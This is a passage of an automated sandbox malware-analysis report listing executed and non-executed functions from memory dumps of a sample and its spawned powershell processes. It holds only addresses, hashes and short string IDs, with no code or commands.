                                                  • Instruction Fuzzy Hash: 1331D452A4D3B2A5D34A77B8B9268E43B509F0122C72C46F7D0DE4E0D7AD492087D6C5
                                                  Function 00007FFD9B878658 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O_^$O_^$O_^$O_^$O_^
                                                  • API String ID: 0-4176698826
                                                  • Opcode ID: a799a3351581b179dc7a1884f2c4d3195b59c548c255665bcd32df0433bcaeb6
                                                  • Instruction ID: c1ec58773a2de0843496a9339d2c64c460c9e3263e2318bed731d7d851e43d97
                                                  • Opcode Fuzzy Hash: a799a3351581b179dc7a1884f2c4d3195b59c548c255665bcd32df0433bcaeb6
                                                  • Instruction Fuzzy Hash: 70313CA3E0BA8E9BE6664F6F9CFA4E42790FF25A9D70616B2C0ED0F153BC1035470141
                                                  Function 00007FFD9B878B38 Relevance: 6.4, Strings: 5, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O_^4$O_^5$O_^6$O_^?$O_^@
                                                  • API String ID: 0-1801408112
                                                  • Opcode ID: 6f6c4555608faf76826f879b4e0ace8fbc13cd3cac208fb67c722bc0b3907759
                                                  • Instruction ID: 3f9ee999794998abe95fa444c95fa5ea8693e17f7040cd83a4ce610564875805
                                                  • Opcode Fuzzy Hash: 6f6c4555608faf76826f879b4e0ace8fbc13cd3cac208fb67c722bc0b3907759
                                                  • Instruction Fuzzy Hash: 9921E3B7B084258A930A7A7DB9195E43780DF9433E70405FBD1AE8F183AC1530878684
                                                  Function 00007FFD9B878AFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O_^4$O_^5$O_^6$O_^?$O_^@
                                                  • API String ID: 0-1801408112
                                                  • Opcode ID: ab6f4be41127e5de64835a39a07bfe7757212f5f904305e31970f2092553ec02
                                                  • Instruction ID: 63a9dcb5faaf1acfb5d501562b714d5bc7748bbb7b359b12eda84530fe9aaa0c
                                                  • Opcode Fuzzy Hash: ab6f4be41127e5de64835a39a07bfe7757212f5f904305e31970f2092553ec02
                                                  • Instruction Fuzzy Hash: 2621E2B7B084258E930B7A7DB9195E43790DF9423A74805FBD1EE8F283AC15308786C4
                                                  Function 00007FFD9B8786F8 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O_^$O_^$O_^$O_^
                                                  • API String ID: 0-2676438797
                                                  • Opcode ID: 2f41d7d23d97139b512322137dc1baa2ede98c0e740b24da9f65e55b796fe585
                                                  • Instruction ID: 267187603c8d3ebf9110ec1405d8293df74e2bbd6c934ac95a74236b6b009286
                                                  • Opcode Fuzzy Hash: 2f41d7d23d97139b512322137dc1baa2ede98c0e740b24da9f65e55b796fe585
                                                  • Instruction Fuzzy Hash: 30215767F0B6D98AD7265B2EACB60E43780FF616AD70902B3C5AE0F153BD14254B4241
                                                  Function 00007FFD9B870790 Relevance: 5.0, Strings: 4, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P_^0$P_^2$P_^4$P_^6
                                                  • API String ID: 0-2515599365
                                                  • Opcode ID: c20f82e8c72d0a8dd7583b526fdf7d054e9064c9369fe6fcb49f3ab8a7369df8
                                                  • Instruction ID: 9f11bc910ddde97c0958251672498a67c8bdd5cde97f9e0b60092faed4a8c681
                                                  • Opcode Fuzzy Hash: c20f82e8c72d0a8dd7583b526fdf7d054e9064c9369fe6fcb49f3ab8a7369df8
                                                  • Instruction Fuzzy Hash: 95F0C2E6909058CAD7056BA86CE43E8379CEF0035C7A80536C0ED8705BE8553987A659
                                                  Function 00007FFD9B870728 Relevance: 5.0, Strings: 4, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P_^0$P_^2$P_^4$P_^6
                                                  • API String ID: 0-2515599365
                                                  • Opcode ID: 9834c90dd016d5611c4058c0f388fc4139b587057148e2d5a1ce5796a91cad08
                                                  • Instruction ID: 7042d83672a712628df446df05b47b1f343430596faf0fd7f7c6ae98344027e0
                                                  • Opcode Fuzzy Hash: 9834c90dd016d5611c4058c0f388fc4139b587057148e2d5a1ce5796a91cad08
                                                  • Instruction Fuzzy Hash: D89002425180A240930A656435654E45B118A0613A60845E2D0D909087784520865144

                                                  Executed Functions

                                                  Function 00007FFD9B966605 Relevance: .4, Instructions: 444COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b308a2940b2553fcf1a3bcedd6587ecc0cacf37ebbfc5475ef57a98a5d5339a4
                                                  • Instruction ID: 7a8f8667824944bca34d446e83104cb553b8885c4c99c66ec79f6777ac84d142
                                                  • Opcode Fuzzy Hash: b308a2940b2553fcf1a3bcedd6587ecc0cacf37ebbfc5475ef57a98a5d5339a4
                                                  • Instruction Fuzzy Hash: 2CD14632A1FB8E9FEBA5DBA848754B57BA0EF16310B0901FED05CC70E3DA18A905C341
                                                  Function 00007FFD9B89A0FB Relevance: .3, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c29724c57bec023804233a925b52cb9cb5435acaed605a11f3f0a131d0043619
                                                  • Instruction ID: af453549ef9ced8971997a148959a1156d3aff7a9da06f83ee0bd490dcfdb620
                                                  • Opcode Fuzzy Hash: c29724c57bec023804233a925b52cb9cb5435acaed605a11f3f0a131d0043619
                                                  • Instruction Fuzzy Hash: E1116D69A0FBCD5FDB538B284C280947FB0EF2721070A02E7D485CB0B3D9295D08C792
                                                  Function 00007FFD9B899738 Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2855f061a4af9dbced812f5da62ed086f47570febd1b02bba84e60a9c116035
                                                  • Instruction ID: 77e5a924ac7bf0415d2e187adf6359ad51c2c58faeccfaad3aaf2137db03ecf3
                                                  • Opcode Fuzzy Hash: b2855f061a4af9dbced812f5da62ed086f47570febd1b02bba84e60a9c116035
                                                  • Instruction Fuzzy Hash: 22415A71A0DB889FDB189F5C9C1A6B87BE0FF59310F50416FE458C3292DB20A945CBC2
                                                  Function 00007FFD9B77E384 Relevance: .1, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769083071.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b77d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f91135cd34842f9794110ad472ab7e8d38106b466ad2e7a46551b2c5818be79
                                                  • Instruction ID: 470ad809314a38628f54bae49b97647dbfc7319dbec8322b8f8531ca9c37ec4d
                                                  • Opcode Fuzzy Hash: 0f91135cd34842f9794110ad472ab7e8d38106b466ad2e7a46551b2c5818be79
                                                  • Instruction Fuzzy Hash: 8D41287150EBC84FE7568B2898959523FF0EF52324B1606EFD088CB1B3D625B846C792
                                                  Function 00007FFD9B89A64C Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                                  • Instruction ID: eb7ea4035f4d3c6ccd3f87fdd779f72889c474952542e29e4713bd372978c180
                                                  • Opcode Fuzzy Hash: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                                  • Instruction Fuzzy Hash: 5721F83190CB4C8FEB59DBAC9C4A7E97FE0EB96321F04416FD049C3162DA749456CB92
                                                  Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                  Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a214e6186cc1042f39e41104f94fe97f31ee36c0095aeec427d2385f308bd464
                                                  • Instruction ID: 4227e4a91347d7e05b6ef6c1d5948bbe964f2afc9bc5b74d24e0f1abd8d8f098
                                                  • Opcode Fuzzy Hash: a214e6186cc1042f39e41104f94fe97f31ee36c0095aeec427d2385f308bd464
                                                  • Instruction Fuzzy Hash: 6CF0BE32B0E5498FD768EB9CE4529E873E0EF6532071600BAE06DC72B3CA25EC41C741
                                                  Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a58d753f950c5fe4c53ed2450ab7512bdb78d82cf33a8f645c155cffd2c128b
                                                  • Instruction ID: bfe193b89df9994d704ca6913f58847bd944f5e5f10796a930887ea48faa20ba
                                                  • Opcode Fuzzy Hash: 8a58d753f950c5fe4c53ed2450ab7512bdb78d82cf33a8f645c155cffd2c128b
                                                  • Instruction Fuzzy Hash: 98F0BE32B0E5498FD765EB9CE0629E873E0EF0532074600BAE05DCB1B3CA26AC40C740
                                                  Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                  • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                  • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

                                                  Non-executed Functions

                                                  Function 00007FFD9B8983D3 Relevance: 9.0, Strings: 7, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: M_^$M_^$M_^$M_^$M_^$M_^$^
                                                  • API String ID: 0-3431015851
                                                  • Opcode ID: 93731e364ea0a6a5f1cc8cf4c7056456136c1aafd6e49b0cf33b1ecd00e5a3a0
                                                  • Instruction ID: 20257abb91d999419d136fb70b0ddb0c2f494fc00c296e455723ba3664105cf9
                                                  • Opcode Fuzzy Hash: 93731e364ea0a6a5f1cc8cf4c7056456136c1aafd6e49b0cf33b1ecd00e5a3a0
                                                  • Instruction Fuzzy Hash: 9C71C253B0FADB1BE723477958790A47F90EF667A471B02F7C4D88B0A3EE04694B8251
                                                  Function 00007FFD9B8983F2 Relevance: 9.0, Strings: 7, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: M_^$M_^$M_^$M_^$M_^$^$^
                                                  • API String ID: 0-3984310336
                                                  • Opcode ID: 2e8734cdb6aaec917914e33b309a7f03731875215ee2f5c1793ddc8369e0023a
                                                  • Instruction ID: 13335b15ed0cff82e5e799a58fe31329e5d59bceaa4563e829c97307f0d9b8fa
                                                  • Opcode Fuzzy Hash: 2e8734cdb6aaec917914e33b309a7f03731875215ee2f5c1793ddc8369e0023a
                                                  • Instruction Fuzzy Hash: C161A153A0FADB5BE723477948790A47F90EF667A471A02F7C4D48A0A3FE04694B8251

                                                  Executed Functions

                                                  Function 00007FFD9B972571 Relevance: .4, Instructions: 423COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1795618329.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3d793171ab02a31cafca529c67708ac3aabd580d8d570e690f84585f8f56c43
                                                  • Instruction ID: 6891b06f8b5d62aee1599491ab8e3ba1e9bcd555b73079eada6be9b1c6fc1774
                                                  • Opcode Fuzzy Hash: d3d793171ab02a31cafca529c67708ac3aabd580d8d570e690f84585f8f56c43
                                                  • Instruction Fuzzy Hash: A5D15622A3FA8E1FE7A5DBA848A55B57BE0EF56310F0901FFD05DC70E3DA18A9058351
                                                  Function 00007FFD9B8A50E5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1795266671.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction ID: 66b3c44c33d79172e357d3888bd286874ef90d71cf170dd002321310a4f04bb7
                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction Fuzzy Hash: B301677121CB0C8FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E882CB45

                                                  Executed Functions

                                                  Function 00007FFD9B982A25 Relevance: .4, Instructions: 442COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1909229171.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7ffd9b980000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8fa09991b8c1a8c93c62b249a32db7685619f75d5fbe0d7eb0ca03a7b2e7c81e
                                                  • Instruction ID: f232a8e9c011018500972da165e653ad0ab0b0f472edd515c189e5ed44927da3
                                                  • Opcode Fuzzy Hash: 8fa09991b8c1a8c93c62b249a32db7685619f75d5fbe0d7eb0ca03a7b2e7c81e
                                                  • Instruction Fuzzy Hash: B9D15922A2FE8E1FE7A5DBB848655B57BE0EF56310B0901FED05DCB1E3D928A805C351
                                                  Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1908623177.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7ffd9b8b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5669af102cff79fe0b70ed9f051b58adc099fd5bf2cb6beff09c2eb34191be54
                                                  • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                  • Opcode Fuzzy Hash: 5669af102cff79fe0b70ed9f051b58adc099fd5bf2cb6beff09c2eb34191be54
                                                  • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41

                                                  Executed Functions

                                                  Function 00007FFD9B952A25 Relevance: .4, Instructions: 448COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2060559323.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_7ffd9b950000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4236689e585acdce3295cf551922ff792e5a43d5f9d4415bf43cc354dffe91de
                                                  • Instruction ID: e56deb24ee9b86bd40d0713120367112c9c087f4e4313328ab5f1b76c5896f1d
                                                  • Opcode Fuzzy Hash: 4236689e585acdce3295cf551922ff792e5a43d5f9d4415bf43cc354dffe91de
                                                  • Instruction Fuzzy Hash: F7D15B21B2FACE1FE7A59BF888655B57BA0EF16310B0901FED49DCB0E3D958A805C351
                                                  Function 00007FFD9B883428 Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2059671531.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_7ffd9b880000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f560faad2d692fb251752d9380fa7a291690ad0b318bdce2c1380cc1bb99454b
                                                  • Instruction ID: 546544054f09e5cc93ed1144df8162569c89a7ff127d73241948bab4e7ac81c6
                                                  • Opcode Fuzzy Hash: f560faad2d692fb251752d9380fa7a291690ad0b318bdce2c1380cc1bb99454b
                                                  • Instruction Fuzzy Hash: 9911823250E7854FE7174B68A8624E07FB0EF1323474A01E7D4D5C74A3D52A5946C795
                                                  Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2059671531.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_7ffd9b880000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423667439589d9ebf630b30f5cfe2cbc8dd7d6bc1a9f9559f6bbbae34852fd24
                                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                  • Opcode Fuzzy Hash: 423667439589d9ebf630b30f5cfe2cbc8dd7d6bc1a9f9559f6bbbae34852fd24
                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                  Executed Functions

                                                  Function 00007FFD9B8733B5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2292042837.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                  • Instruction ID: 240e77624845bd21eb498471991253802ac2a52bcd73a2482a697d82a952278d
                                                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                  • Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42